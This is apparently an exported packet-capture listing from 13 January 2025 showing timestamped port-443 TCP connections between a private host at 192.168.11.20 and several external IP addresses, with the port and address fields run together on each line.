                                                                                                                          Jan 13, 2025 22:01:14.693624973 CET49811443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:14.694787025 CET49811443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:14.694818020 CET44349811137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.695744991 CET44349807137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.695775032 CET44349807137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.695943117 CET49807443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:14.696028948 CET49807443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:14.696058035 CET44349807137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.696084023 CET49807443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:14.696249008 CET49807443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:14.697166920 CET44349807137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.697196960 CET44349807137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.697432041 CET49807443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:14.697459936 CET44349807137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.697524071 CET49807443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:14.697668076 CET49807443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:14.698930025 CET44349807137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.698959112 CET44349807137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.699091911 CET49807443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:14.699204922 CET49807443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:14.699234962 CET44349807137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.699300051 CET49807443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:14.699405909 CET49807443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:14.699687004 CET4434981354.239.153.76192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.699780941 CET4434981354.239.153.76192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.700014114 CET49813443192.168.11.2054.239.153.76
                                                                                                                          Jan 13, 2025 22:01:14.700757980 CET44349812137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.700865984 CET44349812137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.701069117 CET49812443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:14.707942009 CET4434981554.239.153.76192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.707953930 CET4434981554.239.153.76192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.708003044 CET4434981554.239.153.76192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.708019018 CET4434981554.239.153.76192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.708110094 CET4434981554.239.153.76192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.708134890 CET49815443192.168.11.2054.239.153.76
                                                                                                                          Jan 13, 2025 22:01:14.708134890 CET49815443192.168.11.2054.239.153.76
                                                                                                                          Jan 13, 2025 22:01:14.708170891 CET4434981554.239.153.76192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.708197117 CET49815443192.168.11.2054.239.153.76
                                                                                                                          Jan 13, 2025 22:01:14.708197117 CET49815443192.168.11.2054.239.153.76
                                                                                                                          Jan 13, 2025 22:01:14.708312988 CET49815443192.168.11.2054.239.153.76
                                                                                                                          Jan 13, 2025 22:01:14.708319902 CET4434981554.239.153.76192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.708364964 CET49815443192.168.11.2054.239.153.76
                                                                                                                          Jan 13, 2025 22:01:14.710578918 CET49813443192.168.11.2054.239.153.76
                                                                                                                          Jan 13, 2025 22:01:14.710613012 CET4434981354.239.153.76192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.710726976 CET49812443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:14.710762024 CET44349812137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.721991062 CET4434981454.239.153.138192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.722026110 CET4434981454.239.153.138192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.722529888 CET4434981454.239.153.138192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.723022938 CET49814443192.168.11.2054.239.153.138
                                                                                                                          Jan 13, 2025 22:01:14.723596096 CET49814443192.168.11.2054.239.153.138
                                                                                                                          Jan 13, 2025 22:01:14.723596096 CET49814443192.168.11.2054.239.153.138
                                                                                                                          Jan 13, 2025 22:01:14.726136923 CET4434981554.239.153.76192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.726178885 CET4434981554.239.153.76192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.726362944 CET49815443192.168.11.2054.239.153.76
                                                                                                                          Jan 13, 2025 22:01:14.726362944 CET49815443192.168.11.2054.239.153.76
                                                                                                                          Jan 13, 2025 22:01:14.726397038 CET4434981554.239.153.76192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.726414919 CET49815443192.168.11.2054.239.153.76
                                                                                                                          Jan 13, 2025 22:01:14.726463079 CET49815443192.168.11.2054.239.153.76
                                                                                                                          Jan 13, 2025 22:01:14.727756977 CET49822443192.168.11.2054.239.153.76
                                                                                                                          Jan 13, 2025 22:01:14.727802992 CET4434982254.239.153.76192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.727974892 CET49822443192.168.11.2054.239.153.76
                                                                                                                          Jan 13, 2025 22:01:14.728220940 CET49822443192.168.11.2054.239.153.76
                                                                                                                          Jan 13, 2025 22:01:14.728245974 CET4434982254.239.153.76192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.739713907 CET49823443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:14.739758968 CET44349823137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.739778996 CET49824443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:14.739814043 CET49825443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:14.739823103 CET44349824137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.739856005 CET44349825137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.739936113 CET49823443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:14.739980936 CET49825443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:14.740011930 CET49824443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:14.740241051 CET49823443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:14.740273952 CET44349823137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.740391970 CET49825443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:14.740422964 CET44349825137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.740587950 CET49824443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:14.740621090 CET44349824137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.777367115 CET49815443192.168.11.2054.239.153.76
                                                                                                                          Jan 13, 2025 22:01:14.797025919 CET44349807137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.797096014 CET44349807137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.797107935 CET44349807137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.797230959 CET49807443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:14.797347069 CET49807443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:14.797622919 CET49807443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:14.797642946 CET44349807137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.799200058 CET49826443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:14.799226046 CET44349826137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.799443007 CET49826443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:14.799760103 CET49826443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:14.799776077 CET44349826137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.802630901 CET4434981554.239.153.76192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.802637100 CET4434981554.239.153.76192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.802764893 CET4434981554.239.153.76192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.802793026 CET49815443192.168.11.2054.239.153.76
                                                                                                                          Jan 13, 2025 22:01:14.802810907 CET4434981554.239.153.76192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.802891016 CET49815443192.168.11.2054.239.153.76
                                                                                                                          Jan 13, 2025 22:01:14.802901030 CET4434981554.239.153.76192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.802922964 CET49815443192.168.11.2054.239.153.76
                                                                                                                          Jan 13, 2025 22:01:14.802972078 CET49815443192.168.11.2054.239.153.76
                                                                                                                          Jan 13, 2025 22:01:14.803030014 CET49815443192.168.11.2054.239.153.76
                                                                                                                          Jan 13, 2025 22:01:14.819574118 CET4434981554.239.153.76192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.819669008 CET4434981554.239.153.76192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.819755077 CET49815443192.168.11.2054.239.153.76
                                                                                                                          Jan 13, 2025 22:01:14.819755077 CET49815443192.168.11.2054.239.153.76
                                                                                                                          Jan 13, 2025 22:01:14.819781065 CET49815443192.168.11.2054.239.153.76
                                                                                                                          Jan 13, 2025 22:01:14.819848061 CET49815443192.168.11.2054.239.153.76
                                                                                                                          Jan 13, 2025 22:01:14.819848061 CET49815443192.168.11.2054.239.153.76
                                                                                                                          Jan 13, 2025 22:01:14.819879055 CET49815443192.168.11.2054.239.153.76
                                                                                                                          Jan 13, 2025 22:01:14.820048094 CET49815443192.168.11.2054.239.153.76
                                                                                                                          Jan 13, 2025 22:01:14.820066929 CET4434981554.239.153.76192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.830343008 CET49827443192.168.11.20104.17.25.14
                                                                                                                          Jan 13, 2025 22:01:14.830370903 CET44349827104.17.25.14192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.830509901 CET49827443192.168.11.20104.17.25.14
                                                                                                                          Jan 13, 2025 22:01:14.831243992 CET49827443192.168.11.20104.17.25.14
                                                                                                                          Jan 13, 2025 22:01:14.831264019 CET44349827104.17.25.14192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.886909008 CET443498163.171.100.86192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.887207031 CET443498163.171.100.86192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.887417078 CET49816443192.168.11.203.171.100.86
                                                                                                                          Jan 13, 2025 22:01:14.887429953 CET443498163.171.100.86192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.928172112 CET49816443192.168.11.203.171.100.86
                                                                                                                          Jan 13, 2025 22:01:14.928190947 CET443498163.171.100.86192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.928659916 CET49816443192.168.11.203.171.100.86
                                                                                                                          Jan 13, 2025 22:01:14.928679943 CET443498163.171.100.86192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.928695917 CET49816443192.168.11.203.171.100.86
                                                                                                                          Jan 13, 2025 22:01:14.928704977 CET443498163.171.100.86192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.928781986 CET49816443192.168.11.203.171.100.86
                                                                                                                          Jan 13, 2025 22:01:14.928798914 CET443498163.171.100.86192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.986259937 CET44349818137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.986601114 CET49818443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:14.986618996 CET44349818137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.987131119 CET44349818137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:14.987747908 CET49818443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:14.987833977 CET49818443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:14.987888098 CET44349818137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.010704994 CET44349819137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.011158943 CET49819443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:15.011173010 CET44349819137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.011694908 CET44349819137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.012126923 CET49819443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:15.012209892 CET49819443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:15.012267113 CET44349819137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.024840117 CET4434982054.239.153.138192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.025438070 CET49820443192.168.11.2054.239.153.138
                                                                                                                          Jan 13, 2025 22:01:15.025445938 CET4434982054.239.153.138192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.025974035 CET4434982054.239.153.138192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.026618958 CET49820443192.168.11.2054.239.153.138
                                                                                                                          Jan 13, 2025 22:01:15.026756048 CET4434982054.239.153.138192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.026813030 CET49820443192.168.11.2054.239.153.138
                                                                                                                          Jan 13, 2025 22:01:15.026860952 CET4434982154.239.153.76192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.028024912 CET49814443192.168.11.2054.239.153.138
                                                                                                                          Jan 13, 2025 22:01:15.028045893 CET4434981454.239.153.138192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.028103113 CET49818443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:15.028532028 CET49821443192.168.11.2054.239.153.76
                                                                                                                          Jan 13, 2025 22:01:15.028542995 CET4434982154.239.153.76192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.028578043 CET443498163.171.100.86192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.029978991 CET4434982154.239.153.76192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.031642914 CET49821443192.168.11.2054.239.153.76
                                                                                                                          Jan 13, 2025 22:01:15.031642914 CET49821443192.168.11.2054.239.153.76
                                                                                                                          Jan 13, 2025 22:01:15.032002926 CET4434982154.239.153.76192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.061487913 CET49819443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:15.070211887 CET4434982054.239.153.138192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.076555967 CET49821443192.168.11.2054.239.153.76
                                                                                                                          Jan 13, 2025 22:01:15.076581955 CET49816443192.168.11.203.171.100.86
                                                                                                                          Jan 13, 2025 22:01:15.076602936 CET443498163.171.100.86192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.076632023 CET49820443192.168.11.2054.239.153.138
                                                                                                                          Jan 13, 2025 22:01:15.076935053 CET49816443192.168.11.203.171.100.86
                                                                                                                          Jan 13, 2025 22:01:15.076953888 CET443498163.171.100.86192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.129805088 CET443498163.171.100.86192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.129987955 CET443498163.171.100.86192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.130211115 CET443498163.171.100.86192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.130219936 CET49816443192.168.11.203.171.100.86
                                                                                                                          Jan 13, 2025 22:01:15.130232096 CET443498163.171.100.86192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.130465984 CET49816443192.168.11.203.171.100.86
                                                                                                                          Jan 13, 2025 22:01:15.132597923 CET443498163.171.100.86192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.133297920 CET4434982254.239.153.76192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.133660078 CET49822443192.168.11.2054.239.153.76
                                                                                                                          Jan 13, 2025 22:01:15.133681059 CET4434982254.239.153.76192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.134299994 CET4434982254.239.153.76192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.134785891 CET49822443192.168.11.2054.239.153.76
                                                                                                                          Jan 13, 2025 22:01:15.134871006 CET49822443192.168.11.2054.239.153.76
                                                                                                                          Jan 13, 2025 22:01:15.134928942 CET4434982254.239.153.76192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.135374069 CET443498163.171.100.86192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.135389090 CET443498163.171.100.86192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.135632992 CET49816443192.168.11.203.171.100.86
                                                                                                                          Jan 13, 2025 22:01:15.135651112 CET443498163.171.100.86192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.135823965 CET49816443192.168.11.203.171.100.86
                                                                                                                          Jan 13, 2025 22:01:15.138225079 CET443498163.171.100.86192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.138488054 CET49816443192.168.11.203.171.100.86
                                                                                                                          Jan 13, 2025 22:01:15.140953064 CET443498163.171.100.86192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.142633915 CET44349825137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.142728090 CET44349823137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.142968893 CET44349824137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.143129110 CET49823443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:15.143147945 CET44349823137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.143156052 CET49825443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:15.143167019 CET44349825137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.143305063 CET49824443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:15.143325090 CET44349824137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.143719912 CET443498163.171.100.86192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.143733978 CET443498163.171.100.86192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.143898010 CET49816443192.168.11.203.171.100.86
                                                                                                                          Jan 13, 2025 22:01:15.143915892 CET443498163.171.100.86192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.144078970 CET49816443192.168.11.203.171.100.86
                                                                                                                          Jan 13, 2025 22:01:15.144530058 CET44349825137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.144614935 CET44349823137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.144728899 CET49825443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:15.144843102 CET49823443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:15.145076990 CET49825443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:15.145097017 CET44349824137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.145210981 CET44349825137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.145319939 CET49823443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:15.145457983 CET44349823137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.145462990 CET49824443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:15.145560980 CET49824443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:15.145658970 CET44349824137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.145720005 CET49825443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:15.145735979 CET49824443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:15.145736933 CET44349825137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.145744085 CET49823443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:15.145761967 CET44349823137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.146527052 CET443498163.171.100.86192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.149327993 CET443498163.171.100.86192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.149342060 CET443498163.171.100.86192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.149482965 CET49816443192.168.11.203.171.100.86
                                                                                                                          Jan 13, 2025 22:01:15.149502993 CET443498163.171.100.86192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.149645090 CET49816443192.168.11.203.171.100.86
                                                                                                                          Jan 13, 2025 22:01:15.152067900 CET443498163.171.100.86192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.155076981 CET443498163.171.100.86192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.155095100 CET443498163.171.100.86192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.155313969 CET49816443192.168.11.203.171.100.86
                                                                                                                          Jan 13, 2025 22:01:15.155334949 CET443498163.171.100.86192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.155558109 CET49816443192.168.11.203.171.100.86
                                                                                                                          Jan 13, 2025 22:01:15.157977104 CET443498163.171.100.86192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.160525084 CET443498163.171.100.86192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.160752058 CET443498163.171.100.86192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.160835981 CET49816443192.168.11.203.171.100.86
                                                                                                                          Jan 13, 2025 22:01:15.160855055 CET443498163.171.100.86192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.161017895 CET49816443192.168.11.203.171.100.86
                                                                                                                          Jan 13, 2025 22:01:15.163347960 CET443498163.171.100.86192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.166261911 CET443498163.171.100.86192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.166275978 CET443498163.171.100.86192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.166471958 CET49816443192.168.11.203.171.100.86
                                                                                                                          Jan 13, 2025 22:01:15.166491985 CET443498163.171.100.86192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.166646004 CET49816443192.168.11.203.171.100.86
                                                                                                                          Jan 13, 2025 22:01:15.168937922 CET443498163.171.100.86192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.177423954 CET49822443192.168.11.2054.239.153.76
                                                                                                                          Jan 13, 2025 22:01:15.186268091 CET44349824137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.194674969 CET49825443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:15.194710016 CET49824443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:15.194710970 CET49823443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:15.194720984 CET44349824137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.202682018 CET44349826137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.203103065 CET49826443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:15.203114986 CET44349826137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.204022884 CET44349826137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.204251051 CET49826443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:15.204525948 CET49826443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:15.204623938 CET44349826137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.204690933 CET49826443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:15.210273027 CET49816443192.168.11.203.171.100.86
                                                                                                                          Jan 13, 2025 22:01:15.230429888 CET443498163.171.100.86192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.231074095 CET443498163.171.100.86192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.231337070 CET49816443192.168.11.203.171.100.86
                                                                                                                          Jan 13, 2025 22:01:15.231353998 CET443498163.171.100.86192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.233866930 CET443498163.171.100.86192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.234069109 CET49816443192.168.11.203.171.100.86
                                                                                                                          Jan 13, 2025 22:01:15.234086990 CET443498163.171.100.86192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.236665010 CET443498163.171.100.86192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.236896038 CET49816443192.168.11.203.171.100.86
                                                                                                                          Jan 13, 2025 22:01:15.236913919 CET443498163.171.100.86192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.239553928 CET443498163.171.100.86192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.239733934 CET49816443192.168.11.203.171.100.86
                                                                                                                          Jan 13, 2025 22:01:15.239752054 CET443498163.171.100.86192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.242300034 CET443498163.171.100.86192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.242505074 CET49816443192.168.11.203.171.100.86
                                                                                                                          Jan 13, 2025 22:01:15.242522001 CET443498163.171.100.86192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.242659092 CET49816443192.168.11.203.171.100.86
                                                                                                                          Jan 13, 2025 22:01:15.242984056 CET44349827104.17.25.14192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.243300915 CET49827443192.168.11.20104.17.25.14
                                                                                                                          Jan 13, 2025 22:01:15.243319035 CET44349827104.17.25.14192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.244103909 CET49824443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:15.244668007 CET44349827104.17.25.14192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.244894981 CET49827443192.168.11.20104.17.25.14
                                                                                                                          Jan 13, 2025 22:01:15.245218992 CET49826443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:15.245235920 CET44349826137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.245572090 CET49827443192.168.11.20104.17.25.14
                                                                                                                          Jan 13, 2025 22:01:15.245680094 CET49827443192.168.11.20104.17.25.14
                                                                                                                          Jan 13, 2025 22:01:15.245709896 CET44349827104.17.25.14192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.262135029 CET4434982054.239.153.138192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.262209892 CET4434982054.239.153.138192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.262363911 CET49820443192.168.11.2054.239.153.138
                                                                                                                          Jan 13, 2025 22:01:15.262784958 CET49820443192.168.11.2054.239.153.138
                                                                                                                          Jan 13, 2025 22:01:15.262797117 CET4434982054.239.153.138192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.264539003 CET49828443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:15.264568090 CET44349828137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.264658928 CET49829443192.168.11.2054.239.153.76
                                                                                                                          Jan 13, 2025 22:01:15.264683962 CET4434982954.239.153.76192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.264724970 CET49828443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:15.264929056 CET49829443192.168.11.2054.239.153.76
                                                                                                                          Jan 13, 2025 22:01:15.265104055 CET49828443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:15.265122890 CET44349828137.117.65.222192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.265285015 CET49829443192.168.11.2054.239.153.76
                                                                                                                          Jan 13, 2025 22:01:15.265304089 CET4434982954.239.153.76192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.273215055 CET4434982154.239.153.76192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.273546934 CET4434982154.239.153.76192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.273828030 CET49821443192.168.11.2054.239.153.76
                                                                                                                          Jan 13, 2025 22:01:15.274151087 CET49821443192.168.11.2054.239.153.76
                                                                                                                          Jan 13, 2025 22:01:15.274166107 CET4434982154.239.153.76192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.294151068 CET49826443192.168.11.20137.117.65.222
                                                                                                                          Jan 13, 2025 22:01:15.294151068 CET49827443192.168.11.20104.17.25.14
                                                                                                                          Jan 13, 2025 22:01:15.294172049 CET44349827104.17.25.14192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:15.330413103 CET44349818137.117.65.222192.168.11.20
